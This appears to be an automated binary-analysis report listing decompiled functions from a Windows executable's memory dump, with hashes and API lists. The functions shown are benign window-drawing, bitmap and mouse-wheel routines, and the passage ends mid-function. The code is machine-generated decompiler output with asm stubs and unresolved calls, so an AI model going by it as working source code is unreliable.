Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
String ID:
API String ID: 644427674-0
Opcode ID: de28637c75b565a7a6afd24bb6ec7489613feed82cab3300559889407d70de75
Instruction ID: 1228fffddf30234240278f6c42dfef2ef2d340ebba79dd9114fbee5a630f2c20
Opcode Fuzzy Hash: de28637c75b565a7a6afd24bb6ec7489613feed82cab3300559889407d70de75
Instruction Fuzzy Hash: 11410DB1E04219AFDB10EBE5DC42FAFB7FCEB08704F514426B605F7281C679A9108B68

Uniqueness

Uniqueness Score: -1.00%

Function 0043D008, Relevance: 19.7, APIs: 13, Instructions: 213
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0043D008(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				intOrPtr* _t190;
				intOrPtr* _t193;
				void* _t202;
				intOrPtr _t209;
				signed int _t226;
				void* _t229;
				void* _t231;
				intOrPtr _t232;

				_t229 = _t231;
				_t232 = _t231 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_v16 = GetWindowDC(E0043C1F4(_v8));
					_push(_t229);
					_push(0x43d26e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t232;
					GetClientRect(E0043C1F4(_v8),  &_v32);
					GetWindowRect(E0043C1F4(_v8),  &_v48);
					MapWindowPoints(0, E0043C1F4(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t202 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t202 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t202 = _t202 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t226 = GetWindowLongA(E0043C1F4(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t202;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t202;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t202;
						}
						if((_t226 & 0x00200000) != 0) {
							_t193 =  *0x490fe4; // 0x492a9c
							_v48.right = _v48.right +  *((intOrPtr*)( *_t193))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t202;
						}
						if((_t226 & 0x00100000) != 0) {
							_t190 =  *0x490fe4; // 0x492a9c
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t190))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x4769cc + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x4769dc + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x4769ec + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x4769fc + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E0041FC20( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t209);
					 *[fs:eax] = _t209;
					_push(0x43d275);
					return ReleaseDC(E0043C1F4(_v8), _v16);
				} else {
					return  *((intOrPtr*)( *_v8 - 0x10))();
				}
			}

0x0043d009
0x0043d00b
0x0043d011
0x0043d014
0x0043d021
0x0043d041
0x0043d046
0x0043d047
0x0043d04c
0x0043d04f
0x0043d05f
0x0043d071
0x0043d087
0x0043d09c
0x0043d0b5
0x0043d0c0
0x0043d0c1
0x0043d0c2
0x0043d0c3
0x0043d0d3
0x0043d0de
0x0043d0df
0x0043d0e0
0x0043d0e1
0x0043d0ec
0x0043d0f2
0x0043d0fe
0x0043d103
0x0043d103
0x0043d113
0x0043d118
0x0043d118
0x0043d12e
0x0043d13a
0x0043d13c
0x0043d13c
0x0043d149
0x0043d14b
0x0043d14b
0x0043d158
0x0043d15a
0x0043d15a
0x0043d163
0x0043d167
0x0043d170
0x0043d170
0x0043d17d
0x0043d17f
0x0043d17f
0x0043d188
0x0043d18c
0x0043d195
0x0043d195
0x0043d1f5
0x0043d1f5
0x0043d20e
0x0043d219
0x0043d21a
0x0043d21b
0x0043d21c
0x0043d22d
0x0043d249
0x0043d250
0x0043d253
0x0043d256
0x0043d26d
0x0043d275
0x0043d286
0x0043d286

APIs

GetWindowDC.USER32(00000000), ref: 0043D03C
GetClientRect.USER32 ref: 0043D05F
GetWindowRect.USER32 ref: 0043D071
MapWindowPoints.USER32 ref: 0043D087
OffsetRect.USER32(?,?,?), ref: 0043D09C
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043D0B5
InflateRect.USER32(?,00000000,00000000), ref: 0043D0D3
GetWindowLongA.USER32 ref: 0043D129
DrawEdge.USER32(?,?,00000000,00000008), ref: 0043D1F5
IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043D20E
OffsetRect.USER32(?,?,?), ref: 0043D22D
FillRect.USER32 ref: 0043D249
ReleaseDC.USER32 ref: 0043D268

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPointsRelease
String ID:
API String ID: 3115931838-0
Opcode ID: f2bb1449c155b818ac3dedcfc7b2c4e70bf694dc6016d051f9f4b8549ca3e0b7
Instruction ID: 1faef759c327ef8a802d1c5a586fb5fbf755e3f376881b730710df9886f4892a
Opcode Fuzzy Hash: f2bb1449c155b818ac3dedcfc7b2c4e70bf694dc6016d051f9f4b8549ca3e0b7
Instruction Fuzzy Hash: A5811571E04208AFCB01DBA8D885EEEB7F9AF09304F1541A6F518F7252C779AE04DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041FE5C, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 224
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041FE5C(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, intOrPtr _a4, int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				int _v16;
				int _v20;
				int _v24;
				long _v28;
				long _v32;
				struct HDC__* _v36;
				intOrPtr* _v40;
				void* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t116;
				void* _t124;
				int* _t197;
				intOrPtr _t205;
				intOrPtr _t209;
				intOrPtr _t210;
				intOrPtr _t211;
				int _t217;
				int* _t219;
				void* _t222;
				void* _t224;
				intOrPtr _t225;

				_t199 = __ecx;
				_t222 = _t224;
				_t225 = _t224 + 0xffffffd8;
				_v12 = __ecx;
				_t219 = __edx;
				_v8 = __eax;
				_t197 = _a8;
				if(_v12 != 0) {
					E00420334(_v8);
					 *[fs:eax] = _t225;
					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x420102, _t222);
					_t205 =  *0x420114; // 0x9
					E004207D8(_v8, __ecx, _t205);
					E00420334(E00424868(_v12));
					_push(_t222);
					_push(0x4200dd);
					_push( *[fs:eax]);
					 *[fs:eax] = _t225;
					_v20 = _t219[2] -  *_t219;
					_v24 = _t219[3] - _t219[1];
					_t217 = _t197[2] -  *_t197;
					_v16 = _t197[3] - _t197[1];
					if(E00424954(_v12, _t199) != _a4) {
						_v40 = E004242A0(1);
						_t199 =  *_v40;
						 *((intOrPtr*)( *_v40 + 8))();
						E00424AC8(_v40, _a4, __eflags);
						_t116 = E00424868(_v40);
						_t209 =  *0x420118; // 0x1
						E004207D8(_t116,  *_v40, _t209);
						_v36 =  *((intOrPtr*)(E00424868(_v40) + 4));
						__eflags = 0;
						_v44 = 0;
					} else {
						_v40 = 0;
						_v44 =  *((intOrPtr*)( *_v12 + 0x68))();
						_v36 = CreateCompatibleDC(0);
						_v44 = SelectObject(_v36, _v44);
					}
					_push(_t222);
					_push(0x4200bb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t225;
					_t124 = E00424868(_v12);
					_t210 =  *0x420118; // 0x1
					E004207D8(_t124, _t199, _t210);
					if(E0041FD00( *((intOrPtr*)(_v8 + 0x14))) != 1) {
						StretchBlt( *(_v8 + 4),  *_t219, _t219[1], _v20, _v24,  *(E00424868(_v12) + 4),  *_t197, _t197[1], _t217, _v16, 0xcc0020);
						_v32 = SetTextColor( *(_v8 + 4), 0);
						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
						StretchBlt( *(_v8 + 4),  *_t219, _t219[1], _v20, _v24, _v36,  *_t197, _t197[1], _t217, _v16, 0xe20746);
						SetTextColor( *(_v8 + 4), _v32);
						SetBkColor( *(_v8 + 4), _v28);
					} else {
						E00420CA0( *(_v8 + 4), _t197, _t219[1],  *_t219, _t217, _t219, _t197[1],  *_t197, _v36, _v16, _t217, _t197[1],  *_t197,  *(E00424868(_v12) + 4), _v24, _v20);
					}
					_pop(_t211);
					 *[fs:eax] = _t211;
					_push(E004200C2);
					if(_v40 == 0) {
						__eflags = _v44;
						if(_v44 != 0) {
							SelectObject(_v36, _v44);
						}
						return DeleteDC(_v36);
					} else {
						return E004035DC(_v40);
					}
				}
				return __eax;
			}

0x0041fe5c
0x0041fe5d
0x0041fe5f
0x0041fe65
0x0041fe68
0x0041fe6a
0x0041fe6d
0x0041fe74
0x0041fe7d
0x0041fe8d
0x0041fe95
0x0041fe98
0x0041fea1
0x0041feae
0x0041feb5
0x0041feb6
0x0041febb
0x0041febe
0x0041fec6
0x0041fecf
0x0041fed5
0x0041fedd
0x0041feeb
0x0041ff25
0x0041ff2e
0x0041ff30
0x0041ff39
0x0041ff41
0x0041ff46
0x0041ff4c
0x0041ff5c
0x0041ff5f
0x0041ff61
0x0041feed
0x0041feef
0x0041fefa
0x0041ff04
0x0041ff14
0x0041ff14
0x0041ff66
0x0041ff67
0x0041ff6c
0x0041ff6f
0x0041ff75
0x0041ff7a
0x0041ff80
0x0041ff92
0x00420007
0x0042001a
0x0042002e
0x0042005c
0x0042006c
0x0042007c
0x0041ff94
0x0041ffca
0x0041ffca
0x00420083
0x00420086
0x00420089
0x00420092
0x0042009e
0x004200a2
0x004200ac
0x004200ac
0x00000000
0x00420094
0x00000000
0x00420097
0x00420092
0x0042010f

APIs

Part of subcall function 00420334: RtlEnterCriticalSection.KERNEL32(00492A5C,00000000,0041EAD2,00000000,0041EB31), ref: 0042033C
Part of subcall function 00420334: RtlLeaveCriticalSection.KERNEL32(00492A5C,00492A5C,00000000,0041EAD2,00000000,0041EB31), ref: 00420349
Part of subcall function 00420334: RtlEnterCriticalSection.KERNEL32(00000038,00492A5C,00492A5C,00000000,0041EAD2,00000000,0041EB31), ref: 00420352

CreateCompatibleDC.GDI32(00000000), ref: 0041FEFF
SelectObject.GDI32(?,?), ref: 0041FF0F
StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 00420007
SetTextColor.GDI32(?,00000000), ref: 00420015
SetBkColor.GDI32(?,00FFFFFF), ref: 00420029
StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 0042005C
SetTextColor.GDI32(?,?), ref: 0042006C
SetBkColor.GDI32(?,?), ref: 0042007C
SelectObject.GDI32(?,00000000), ref: 004200AC
DeleteDC.GDI32(?), ref: 004200B5

Strings

A, xrefs: 0041FF1B

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$CriticalSection$EnterObjectSelectStretchText$CompatibleCreateDeleteLeave
String ID: A
API String ID: 675119849-2078354741
Opcode ID: 532be5d483dbf9cb3ec60fc06837030935e4f310f3c9beb7ba52a6b7aab83728
Instruction ID: 48a5c3743e2b23e4cbd1a4c0cefae734c0b5b9385aeea1f21deab3d0ef1a18f4
Opcode Fuzzy Hash: 532be5d483dbf9cb3ec60fc06837030935e4f310f3c9beb7ba52a6b7aab83728
Instruction Fuzzy Hash: 2D91E575A00118AFCB40EFA9D981E9EBBF8EF4D300B5584AAF508E7352C634ED40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00407350, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61
registryclipboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407350(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}

0x00407357
0x00407359
0x0040735b
0x0040736d
0x0040737c
0x00407388
0x00407394
0x00407399
0x004073b8
0x0040739f
0x004073af
0x004073af
0x004073bd
0x004073da
0x004073c3
0x004073d3
0x004073d3
0x004073e7

APIs

FindWindowA.USER32 ref: 00407368
RegisterClipboardFormatA.USER32 ref: 00407374
RegisterClipboardFormatA.USER32 ref: 00407383
RegisterClipboardFormatA.USER32 ref: 0040738F
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004073A7
SendMessageA.USER32(00000000,?,00000000,00000000), ref: 004073CB

Strings

MSH_WHEELSUPPORT_MSG, xrefs: 0040737E
MSH_SCROLL_LINES_MSG, xrefs: 0040738A
MouseZ, xrefs: 00407363
Magellan MSWHEEL, xrefs: 0040735E
MSWHEEL_ROLLMSG, xrefs: 0040736F

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardFormatRegister$MessageSend$FindWindow
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 1416857345-3736581797
Opcode ID: 6a6299560d5f7dd8f7aac53574e80a38f3371f82bf0e59142655c396c95621b1
Instruction ID: bfd4119d45ddda525be3bbc129672977e668141d205ce17450295656e3e08ae5
Opcode Fuzzy Hash: 6a6299560d5f7dd8f7aac53574e80a38f3371f82bf0e59142655c396c95621b1
Instruction Fuzzy Hash: C7114F70A48341AFE7019F55DC81B2AB7A8EF45710F204076FD40AB3C1D6B8AC40D7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00427740, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00427740(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x492acb != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x492ab8 = E00427194(7, _t60,  *0x492ab8, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 00427779
GetSystemMetrics.USER32 ref: 0042779E
GetSystemMetrics.USER32 ref: 004277A9
GetClipBox.GDI32(?,?), ref: 004277BB
GetDCOrgEx.GDI32(?,?), ref: 004277C8
OffsetRect.USER32(?,?,?), ref: 004277E1
IntersectRect.USER32 ref: 004277F2
IntersectRect.USER32 ref: 00427808

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

Strings

EnumDisplayMonitors, xrefs: 00427758

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: 5fddcd15ba12338e676d961c3f27d91796c62e49003d0812497e89beca1a2251
Instruction ID: 93d8ab06026ef900d934534446d411bfcde0b04aea28e17855bc4cd7e74bdb2b
Opcode Fuzzy Hash: 5fddcd15ba12338e676d961c3f27d91796c62e49003d0812497e89beca1a2251
Instruction Fuzzy Hash: 9A315E72E04129AFDB11DFA5DC459EFB7BCEB09314F404137F915E2241E6789901CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00424596, Relevance: 16.7, APIs: 11, Instructions: 165
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00424596(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HPALETTE__* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				struct HPALETTE__* _t74;
				signed int _t80;
				signed int _t81;
				char _t82;
				void* _t89;
				void* _t135;
				intOrPtr* _t165;
				intOrPtr _t173;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t181;
				int* _t185;
				intOrPtr _t187;
				void* _t189;
				void* _t190;
				intOrPtr _t191;

				_t166 = __ecx;
				_t189 = _t190;
				_t191 = _t190 + 0xffffffe4;
				_t185 = __ecx;
				_v8 = __edx;
				_t165 = __eax;
				_t187 =  *((intOrPtr*)(__eax + 0x28));
				_t173 =  *0x4247e4; // 0xf
				E004207D8(_v8, __ecx, _t173);
				E00424C08(_t165);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *(_t187 + 0x10);
				if(_t74 != 0) {
					_v12 = SelectPalette( *(_v8 + 4), _t74, 0xffffffff);
					RealizePalette( *(_v8 + 4));
					_v13 = 1;
				}
				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
				_t80 = GetDeviceCaps( *(_v8 + 4), 0xe);
				_pop(_t174);
				_t81 = _t174 * _t80;
				if(_t81 > 8) {
					L5:
					_t82 = 0;
				} else {
					_t166 =  *(_t187 + 0x28) & 0x0000ffff;
					if(_t81 < ( *(_t187 + 0x2a) & 0x0000ffff) * ( *(_t187 + 0x28) & 0x0000ffff)) {
						_t82 = 1;
					} else {
						goto L5;
					}
				}
				if(_t82 == 0) {
					if(E00424924(_t165) == 0) {
						SetStretchBltMode(E00420704(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t189);
				_push(0x4247d5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				if( *((intOrPtr*)( *_t165 + 0x28))() != 0) {
					E00424BA8(_t165, _t166);
				}
				_t89 = E00424868(_t165);
				_t177 =  *0x4247e4; // 0xf
				E004207D8(_t89, _t166, _t177);
				if( *((intOrPtr*)( *_t165 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t185, _t185[1], _t185[2] -  *_t185, _t185[3] - _t185[1],  *(E00424868(_t165) + 4), 0, 0,  *(_t187 + 0x1c),  *(_t187 + 0x20),  *(_v8 + 0x20));
					_pop(_t179);
					 *[fs:eax] = _t179;
					_push(E004247DC);
					if(_v13 != 0) {
						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t189);
					_push(0x42476a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t191;
					_v28 = E00420AFC(CreateCompatibleDC(0));
					_v32 = SelectObject(_v28,  *(_t187 + 0xc));
					E00420CA0( *(_v8 + 4), _t165, _t185[1],  *_t185, _t185, _t187, 0, 0, _v28,  *(_t187 + 0x20),  *(_t187 + 0x1c), 0, 0,  *(E00424868(_t165) + 4), _t185[3] - _t185[1], _t185[2] -  *_t185);
					_t135 = 0;
					_pop(_t181);
					 *[fs:eax] = _t181;
					_push(0x4247af);
					if(_v32 != 0) {
						_t135 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t135;
				}
			}

0x00424596
0x00424599
0x0042459b
0x004245a1
0x004245a3
0x004245a6
0x004245a8
0x004245ab
0x004245b4
0x004245bb
0x004245c2
0x004245c5
0x004245c9
0x004245ce
0x004245df
0x004245e9
0x004245ee
0x004245ee
0x00424600
0x0042460a
0x0042460f
0x00424613
0x00424618
0x00424629
0x00424629
0x0042461a
0x0042461e
0x00424627
0x0042462d
0x00000000
0x00000000
0x00000000
0x00424627
0x00424631
0x00424674
0x00424681
0x00424681
0x00424633
0x0042463e
0x0042464c
0x00424664
0x00424664
0x00424688
0x00424689
0x0042468e
0x00424691
0x0042469d
0x004246a1
0x004246a1
0x004246a8
0x004246ad
0x004246b3
0x004246c1
0x004247aa
0x004247b1
0x004247b4
0x004247b7
0x004247c0
0x00000000
0x004247cf
0x004247d4
0x004246c7
0x004246c9
0x004246ce
0x004246d3
0x004246d4
0x004246d9
0x004246dc
0x004246eb
0x004246fb
0x00424735
0x0042473a
0x0042473c
0x0042473f
0x00424742
0x0042474b
0x00424755
0x00424755
0x0042475e
0x00000000
0x00424764
0x00424769
0x00424769

APIs

Part of subcall function 00424C08: GetDC.USER32(00000000), ref: 00424C5E
Part of subcall function 00424C08: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C73
Part of subcall function 00424C08: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424C7D
Part of subcall function 00424C08: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CA1
Part of subcall function 00424C08: ReleaseDC.USER32 ref: 00424CAC

SelectPalette.GDI32(?,?,000000FF), ref: 004245DA
RealizePalette.GDI32(?), ref: 004245E9
GetDeviceCaps.GDI32(?,0000000C), ref: 004245FB
GetDeviceCaps.GDI32(?,0000000E), ref: 0042460A
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042463E
SetStretchBltMode.GDI32(?,00000004), ref: 0042464C
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424664
CreateCompatibleDC.GDI32(00000000), ref: 004246E1
SelectObject.GDI32(?,?), ref: 004246F6

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$Palette$BrushCreateSelect$CompatibleHalftoneModeObjectRealizeReleaseStretch
String ID:
API String ID: 2358456236-0
Opcode ID: 822d8c0c5b1fc19b466cdd28b2e5daef08d5921011be1d414dc2d49bcb9e4c9c
Instruction ID: c3d246f68cfade31653b275566af5ea7f18495ef8c9c9298942679e887091d32
Opcode Fuzzy Hash: 822d8c0c5b1fc19b466cdd28b2e5daef08d5921011be1d414dc2d49bcb9e4c9c
Instruction Fuzzy Hash: FA516BB5B00215AFCB40EFA9D985E5EBBF8EB89304F51846AB509E7281D738ED00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0043A424, Relevance: 16.6, APIs: 11, Instructions: 133
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0043A424(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				struct HBITMAP__* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				int _v84;
				void* _v96;
				int _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t59;
				intOrPtr* _t88;
				intOrPtr _t107;
				void* _t108;
				struct HDC__* _t110;
				void* _t113;
				void* _t116;
				void* _t118;
				intOrPtr _t119;

				_t116 = _t118;
				_t119 = _t118 + 0xffffff94;
				_push(_t108);
				_t113 = __edx;
				_t88 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t88 + 0x55) & 0x00000001) != 0 || E0043907C(_t88) != 0) {
						_t38 = E00439F44(_t88, _t88, _t113, _t108, _t113);
					} else {
						_t38 =  *((intOrPtr*)( *_t88 - 0x10))();
					}
					return _t38;
				} else {
					_t110 = GetDC(0);
					 *((intOrPtr*)( *_t88 + 0x44))();
					 *((intOrPtr*)( *_t88 + 0x44))();
					_v12 = CreateCompatibleBitmap(_t110, _v104, _v84);
					ReleaseDC(0, _t110);
					_v8 = CreateCompatibleDC(0);
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t119;
					_t59 = BeginPaint(E0043C1F4(_t88),  &_v80);
					E00436D28(_t88, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t113 + 4)) = _v8;
					E0043A424(_t88, _t113);
					 *((intOrPtr*)(_t113 + 4)) = 0;
					 *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x43a576, _t116);
					 *((intOrPtr*)( *_t88 + 0x44))();
					BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020);
					EndPaint(E0043C1F4(_t88),  &_v80);
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x43a57d);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
